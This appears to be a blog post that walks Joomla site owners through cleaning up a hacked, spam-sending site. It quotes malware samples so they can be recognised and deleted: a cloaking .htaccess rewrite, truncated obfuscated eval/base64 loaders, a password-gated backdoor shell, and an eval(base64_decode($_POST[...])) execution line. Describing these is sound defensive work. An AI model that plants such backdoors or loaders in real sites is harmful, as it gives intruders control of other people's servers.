If you are using Joomla (particularly on Joomla 2.5.20 or lower) and you website has been hacked and it sending lots of spam emails from your server, then there might be some hidden code left on your webserver by Malware.
Please find the list of thing which need checking as below;
1. Check a .htaccess file (if you got any) for something unusual script exist like below;
2. Find any common.php file on the root folder and if you are not sure about it. You can also check whether you see something like below on that file. Please, just delete it.
3. Search for any ajax.php file on any folder and if found it, please check whether you see something like below on that file. If found, please just delete it.
4. Similarly, search for any smile.php file on any folder and if found it, please check whether you see something like below on that file. If found, please just delete it.
5. Futher, search for any file having below script (particularly update.php file) on any folder and if found it. If found, please just delete those script and make sure you have the right script on those files.
6. Moreover, search for p.txt file and if you found it, and if it contains only encrypted string, please delete that file as well;
7. Also, search for eval(base64_decode($_POST[' script across all files and if you found any, that was put by malware, so delete that line of code across all those found files. Normally, the below code is added at the very top or very bottom of the files;
8. Lastly, search for all error_log files across all the folder and delete all if you reckon, they should not be there.
Also, it's quite painful and time consuming to go through all above steps, but just search for any of above scripts which are similar or have similar patterns and trash all. Just beware that targeted file names may be different sometimes.
If you have got anything different then mentioned above, and you got any solution, please comment on this article so that it would be helpful to others
Please find the list of thing which need checking as below;
1. Check a .htaccess file (if you got any) for something unusual script exist like below;
< IfModule mod_rewrite.c >
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|aol|yahoo|bing)
RewriteCond %{REQUEST_URI} /$ [OR]
RewriteCond %{REQUEST_FILENAME} (html|htm|php)$ [NC]
RewriteCond %{REQUEST_FILENAME} !common.php
RewriteCond /home/sitename/public_html//common.php -f
RewriteRule ^.*$ /common.php [L]
< / IfModule >
Just remove the above script or if can also replace a .htaccess file with standard joomla .htaccess file.2. Find any common.php file on the root folder and if you are not sure about it. You can also check whether you see something like below on that file. Please, just delete it.
$PXyCcfGZONUJafapZKpDwrnNv='ba'.'se64_d'.'ecod'.'e';
eval($PXyCcfGZONUJafapZKpDwrnNv("cHJlZ19yZXBsYWNlKCIvQ1JOVjNDQzhOSFNiQ3JWdHNEQkZtRGJlaS9lIiwgIkp3PWVScG1CdHNIM........."));
3. Search for any ajax.php file on any folder and if found it, please check whether you see something like below on that file. If found, please just delete it.
$x74="+HM)?Z\"Yb&eny`{BPX^(=3}DT@q-m#9;UwI_[]8p/a~sE4zvW:%7*AdF0\r GruLfh>1cl!Vgt<.RQKJx6i\t5o|\\CN\$O\n,'2Skj";
$GLOBALS['utxje85'] = $x74[10].$x74[60].$x74[60].$x74[84].$x74[60].$x74[35].$x74[60].$x74[10]
.......
.......;
4. Similarly, search for any smile.php file on any folder and if found it, please check whether you see something like below on that file. If found, please just delete it.
eval(gzinflate(base64_decode('7X1rcxs5kuBnd0T/B7ia3STHfMpv0ZQt62G7bUtqS7bbLSkYRVaRKqvIo...........
.......
.......)));
5. Futher, search for any file having below script (particularly update.php file) on any folder and if found it. If found, please just delete those script and make sure you have the right script on those files.
if(!empty($_GET['action']) && $_GET['action'] == 'set_password' && !empty($_GET['hashed_password'])) {
$hashed_password = $_GET['hashed_password'];
$fh = fopen(PASSWORD_FILE, "w");
if($fh==false) die("unable to create file");
fputs ($fh, $hashed_password);
fclose ($fh);
exit;
}
if(!file_exists(PASSWORD_FILE)) {
$hashed_password = 'a6a8cb877ee18215f2c0fc2a6c7b4f2a';
$fh = fopen(PASSWORD_FILE, "w");
if($fh==false) die("unable to create file");
fputs ($fh, $hashed_password);
fclose ($fh);
}
else {
$hashed_password = trim(file_get_contents(PASSWORD_FILE));
}
define('SHELL_PASSWORD', $hashed_password);
define('MAX_UP_LEVELS', 10);
if(empty($_COOKIE['password']) && empty($_POST['password']) || (!empty($_POST['password']) && md5($_POST['password']) != SHELL_PASSWORD)) {
print '< form method="post" >
Password : < input name="password" type="text" / > < input type="submit" / >< / form >
';
}
if(!empty($_POST['password']) && md5($_POST['password']) == SHELL_PASSWORD) {
setcookie('password', SHELL_PASSWORD, time() + 60*60*24);
header("Location: {$_SERVER['PHP_SELF']}");
exit;
}
if(empty($_COOKIE) || $_COOKIE['password'] != SHELL_PASSWORD) {
exit;
}
// Actual Joomla Code Start from here....
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);
....
....
6. Moreover, search for p.txt file and if you found it, and if it contains only encrypted string, please delete that file as well;
// sample encrypted code a6a8cb877ee18215f2c0fc2a6c7b4f2a
7. Also, search for eval(base64_decode($_POST[' script across all files and if you found any, that was put by malware, so delete that line of code across all those found files. Normally, the below code is added at the very top or very bottom of the files;
eval(base64_decode($_POST['n26712b']));
8. Lastly, search for all error_log files across all the folder and delete all if you reckon, they should not be there.
Also, it's quite painful and time consuming to go through all above steps, but just search for any of above scripts which are similar or have similar patterns and trash all. Just beware that targeted file names may be different sometimes.
If you have got anything different then mentioned above, and you got any solution, please comment on this article so that it would be helpful to others
No comments:
Post a Comment
Please post any queries and comments here.